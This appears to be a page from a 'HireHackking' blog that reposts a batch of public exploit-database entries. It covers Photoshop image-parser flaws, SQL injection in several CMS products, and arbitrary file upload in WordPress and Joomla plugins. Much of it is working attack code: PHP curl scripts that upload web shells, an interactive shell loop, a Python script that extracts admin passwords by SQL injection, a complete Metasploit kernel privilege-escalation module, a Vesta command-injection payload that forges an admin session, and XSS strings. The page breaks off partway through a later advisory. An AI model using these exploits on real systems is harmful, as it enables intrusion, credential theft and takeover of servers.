Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863149327

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#####################################################################################

Application:   Adobe Photoshop CC 2014 & Bridge CC 2014

Platforms:   Windows

Versions:   The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.

Secunia:

{PRL}:   2015-07

Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.

Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshop’s featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.

(https://en.wikipedia.org/wiki/Adobe_Photoshop)

#####################################################################################

============================
2) Report Timeline
============================

2015-03-15: Francis Provencher from Protek Research Lab’s found the issue;
2015-03-19: Francis Provencher From Protek Research Lab’s report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)

#####################################################################################

============================
3) Technical details
============================

An error in the the GIF parser, could lead to a memory corruption when processing a crafted GIF image with an invalid value in the “ImageLeftPosition” into

the “ImageDescriptor”.

Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires

tricking a user into opening or previewing a malicious file.

#####################################################################################

===========

4) POC

===========

http://protekresearchlab.com/exploits/PRL-2015-07.gif
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37347.gif


###############################################################################
HireHackking 
#####################################################################################

Application:   Adobe Photoshop CC 2014 & Bridge CC 2014

Platforms:   Windows

Versions:   The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.

Secunia:

{PRL}:   2015-08

Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.

Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshop’s featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.

(https://en.wikipedia.org/wiki/Adobe_Photoshop)

#####################################################################################

============================
2) Report Timeline
============================

2015-03-15: Francis Provencher from Protek Research Lab’s found the issue;
2015-03-19: Francis Provencher From Protek Research Lab’s report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)

#####################################################################################

============================
3) Technical details
============================

An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.

Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires

tricking a user into opening or previewing a malicious file.

#####################################################################################

===========

4) POC

===========

http://protekresearchlab.com/exploits/PRL-2015-08.png
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37348.png

###############################################################################
HireHackking 
source: https://www.securityfocus.com/bid/53764/info

AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--
HireHackking 
source: https://www.securityfocus.com/bid/53764/info
 
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]
HireHackking
source: https://www.securityfocus.com/bid/53790/info The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>"/test/")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php lo.php <?php phpinfo(); ?>
HireHackking

Bigware Shop 2.1x - 'main_bigware_54.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53810/info Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Bigware Shop versions prior to 2.17 are vulnerable. #!/usr/bin/python # -*- coding: utf-8 -*- import httplib2 import urllib import sys # insert your target link here (with trailing slash) url = "http://www.example.com/" h = httplib2.Http() # send sql injection headerdata = {'Content-type': 'application/x-www-form-urlencoded'} sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' postdata = { 'voteid' : '2', \ 'pollid' : sqli, \ 'x' : '1', \ 'y' : '1', \ 'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'} response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata)) print content, "\n", "\n" print "If there is an error stating the duplicate admin entry, your shop is vulnerable."
HireHackking

MyBB 1.6.8 - 'member.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53814/info MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. MyBB 1.6.8 is vulnerable; other versions may also be affected. http://www.example.com/forums/member.php?action=profile&uid=[Sqli]
HireHackking

GeniXCMS 0.0.3 - Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: Persistent XSS # Google Dork: intitle: Persistent XSS # Date: 2015-06-21 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: genixcms.org # Software Link: genixcms.org # Version: 0.0.3 # Tested on: windows 7 # Category: webapps Vendor: ============================================= genixcms.org Product: ===================================================== GeniXCMS v0.0.3 is a PHP based content management system Advisory Information: =================================================== Multiple persistent & reflected XSS vulnerabilities Vulnerability Details: ========================================================= GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS XSS Exploit code(s): ==================== Persistent XSS: ----------------------- http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token= 1-content input field content injected XSS will execute after posting is published 2-title input field title injected XSS will execute immediate. Relected XSS: --------------------- http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script> Disclosure Timeline: ========================================================= Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: ========================================================= Med Description: ========================================================= Request Method(s): [+] GET & POST Vulnerable Product: [+] GeniXCMS 0.0.3 Vulnerable Parameter(s): [+] q, content & title Affected Area(s): [+] index.php =============================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
HireHackking

GeniXCMS 0.0.3 - 'register.php' SQL Injection

HACKER · %s · %s

# Exploit Title: Genixcms register.php multiple SQL vuln # Date: 2015-06-23 # Exploit Author: cfreer (poc-lab) # Vendor Homepage: http://www.genixcms.org # Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip # Version: 0.0.3 # Tested on: Apache/2.4.7 (Win32) # CVE : CVE-2015-3933 ===================== SOFTWARE DESCRIPTION ===================== Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS. ============================= VULNERABILITY: SQL Injection ============================= Poc: 1、Genixcms register.php email SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 199 email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab \inc\lib\User.class.php public static function is_email($vars){ if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND `id` != '{$_GET['id']}' "; }else{ $where = ''; } $e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}"); if(Db::$num_rows > 0){ return false; }else{ return true; } } ============================================================================================================================================== 2、Genixcms register.php userid SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 224 email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' \inc\lib\User.class.php public static function is_exist($user) { if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND `id` != '{$_GET['id']}' "; }else{ $where = ''; } $usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} "); $n = Db::$num_rows; if($n > 0 ){ return false; }else{ return true; } }
HireHackking
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows ClientCopyImage Win32k Exploit', 'Description' => %q{ This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # vulnerability discovery and exploit in the wild 'hfirefox', # Code released on github 'OJ Reeves' # msf module ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => 'win', 'SessionTypes' => [ 'metrepreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-1701'], ['MSB', 'MS15-051'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'], ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'], ['URL', 'https://technet.microsoft.com/library/security/MS15-051'] ], 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0 })) end def check # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work) # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works) # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works) # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works) if sysinfo['OS'] !~ /windows/i return Exploit::CheckCode::Unknown end if sysinfo['Architecture'] =~ /(wow|x)64/i arch = ARCH_X86_64 elsif sysinfo['Architecture'] =~ /x86/i arch = ARCH_X86 end file_path = expand_path('%windir%') << '\\system32\\win32k.sys' major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") return Exploit::CheckCode::Safe if build == 7601 return Exploit::CheckCode::Detected end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') end if sysinfo['Architecture'] =~ /wow64/i fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Metrepreter::RequestError # Reader Sandbox won't allow to create a new process: # stdapi_sys_process_execute: Operation failed: Access is denied. print_status('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") if target.arch.first == ARCH_X86 dll_file_name = 'cve-2015-1701.x86.dll' else dll_file_name = 'cve-2015-1701.x64.dll' end library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name) library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end
HireHackking

Vesta Control Panel 0.9.8 - OS Command Injection

HACKER · %s · %s

Advisory ID: HTB23261 Product: Vesta Control Panel Vendor: http://vestacp.com Vulnerable Version(s): 0.9.8 and probably prior Tested Version: 0.9.8 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Patch: June 3, 2015 Public Disclosure: June 17, 2015 Vulnerability Type: OS Command Injection [CWE-78] CVE Reference: CVE-2015-4117 Risk Level: Critical CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system. The vulnerability exists due to insufficient filtration of user-input passed via the "backup" HTTP GET parametre to "/list/backup/index.php" before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel "admin" account. Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system. A simple exploit below will create a PHP session file in "/tmp/" directory with administrative access to Vesta Control Panel: https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20 echo 'V0VCX1NZU1RFTXxzOjc6ImFwYWNoZTIiO1dFQl9SR1JPVVBTfHM6ODoid3d3LWRhdGEiO1dFQl9QT1JUfHM6NDoiODA4MCI7V0VCX1NTTHxzOjc6Im1vZF9zc2wiO1dFQl9TU0xfUE9SVHxzOjQ6Ijg0NDMiO1BST1hZX1NZU1RFTXxzOjU6Im5naW54IjtQUk9YWV9QT1JUfHM6MjoiODAiO1BST1hZX1NTTF9QT1JUfHM6MzoiNDQzIjtGVFBfU1lTVEVNfHM6NjoidnNmdHBkIjtNQUlMX1NZU1RFTXxzOjU6ImV4aW00IjtJTUFQX1NZU1RFTXxzOjc6ImRvdmVjb3QiO0FOVElWSVJVU19TWVNURU18czowOiIiO0FOVElTUEFNX1NZU1RFTXxzOjA6IiI7REJfU1lTVEVNfHM6NToibXlzcWwiO0ROU19TWVNURU18czo1OiJiaW5kOSI7U1RBVFNfU1lTVEVNfHM6MTc6IndlYmFsaXplcixhd3N0YXRzIjtCQUNLVVBfU1lTVEVNfHM6NToibG9jYWwiO0NST05fU1lTVEVNfHM6NDoiY3JvbiI7RElTS19RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU18czo4OiJpcHRhYmxlcyI7RklSRVdBTExfRVhURU5TSU9OfHM6ODoiZmFpbDJiYW4iO1JFUE9TSVRPUll8czo1OiJjbW1udCI7VkVSU0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsYW5ndWFnZXxzOjI6ImVuIjt1c2VyfHM6NToiYWRtaW4iO2JhY2t8czoxMToiL2xpc3QvdXNlci8iOw==' | base64 --decode > /tmp/sess_12345%20||%20echo%20\ After successful creation of PHP session file, the following cookie can be used to gain administrative access: GET / HTTP/1.1 Cookie: mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345 ----------------------------------------------------------------------------------------------- Solution: Update to Vesta Control Panel 0.9.8-14 More Information: http://vestacp.com/roadmap/#history ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel. [2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking
source: https://www.securityfocus.com/bid/53855/info WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable. <?php $uploadfile="lo.php.gif"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'Submit'=>'submit')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif lo.php.gif <?php phpinfo(); ?>
HireHackking
source: https://www.securityfocus.com/bid/53931/info WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php.jpg"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('myfile'=>"@$uploadfile", 'mode'=>'image')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
HireHackking
source: https://www.securityfocus.com/bid/53945/info FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. nj3ct0rK3d-Sh3lL#"; $uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php if ($uploadfile != "exit") { $ch = curl_init("http://www.example.com/modules/fileManager/xupload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'path'=>'img')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; } else break; ?>
HireHackking
source: https://www.securityfocus.com/bid/53944/info The Joomsport component for Joomla! is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. <?php error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); return $resp; } print "\n|===============================================|"; print "\n| Joomla (com_joomsport) Arbitrary Shell Upload |"; print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com>|"; print "\n|===============================================|\n"; if ($argc < 2) { print "\nUsage : php $argv[0] [host] [path]"; print "\nExample : php $argv[0] www.p0c.tld /wp/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $data = "Content-Disposition: form-data; name=\"Filename\"; filename=\"k3d.php.png\"\r\n"; $data .= "Content-Type: application/octet-stream\r\n\r\n"; $packet = "POST {$path}components/com_joomsport/includes/imgres.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($data)."\r\n"; $packet .= "Content-Type: image/png\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html); if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; define(STDIN, fopen("php://stdin", "r")); while(1) { print "\n Inj3ct0rK3d-Sh3lL#"; $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php.png if ($cmd != "exit") { $packet = "GET {$path}k3d.php.png{$html[3]} HTTP/1.0\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Connection: close\r\n\r\n"; $output = http_send($host, $packet); } else break; } ?> Access Shell : http://www.example.com/components/com_joomsport/images/k3d.php.png #### Exploit (2) Blind SQL Injection => <?php $bs = curl_init("http://www.example.com/components/com_joomsport/includes/func.php"); curl_setopt($bs, CURLOPT_POST, true); curl_setopt($bs, CURLOPT_POSTFIELDS, array('query'=>"SELECT * FROM jos_users")); curl_setopt($bs, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($bs); curl_close($bs); print "$postResult"; ?>
HireHackking

Ignite Solutions CMS - 'car-details.php' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53771/info Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/car-details.php?ID=[Sql]
HireHackking
source: https://www.securityfocus.com/bid/53850/info The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data. An attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Email Newsletter 8.0 is vulnerable; other versions may also be affected. http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user
HireHackking
source: https://www.securityfocus.com/bid/53851/info The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected. <?php $uploadfile="lo.php.gif"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'room'=>'./')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
HireHackking

WordPress Plugin Huge-IT Slider 2.7.5 - Multiple Vulnerabilities

HACKER · %s · %s

# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion # Date: 2015-06-23 # Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip # Version: 2.7.5 # Tested on: windows 7 ultimate + Firefox. # video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8 ==================================================== * CSRF + Persistent JS/HTML Injection ==================================================== ===================== DECRIPTION ===================== An attacker can make a user with access privileges to a page containing malicious script and send some parameters injected JavaScript to the database. ============================ vulnerable POST parameters ============================ //variables with variation names// order_by_[variation_number] titleimage[variation_number] sl_url[variation_number] sl_link_target[variation_number] im_description[variation_number] imagess[variation_number] //variables with constant names// sl_pausetime sl_changespeed =============== EXPLOTATION =============== variable numbers can be extracted from a published page containing the slider. and make all parameters injected with code JS / HTML. ------------------- EXAMPLE ------------------- [Extracting data for use] In a vulnerable site and has posted a slider, the malicious user can extract information the attack is successful. ----------------------------------------------------------------------------------------- [variation_number] is a variable number that could be extracted as follows. ----------------------------------------------------------------------------------------- The attacker sees the following framento source code of the page with slider: <!-- ##########################DOTS######################### --> <div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ] <div class="huge_it_slideshow_dots_thumbnails_2"> <div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1" onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true); return false;" image_id="14" [ <---ITS_VARIATION_NUMBER!!! ] image_key="0"></div> </div> <a id="huge_it_slideshow_left_1" href="#" > <div 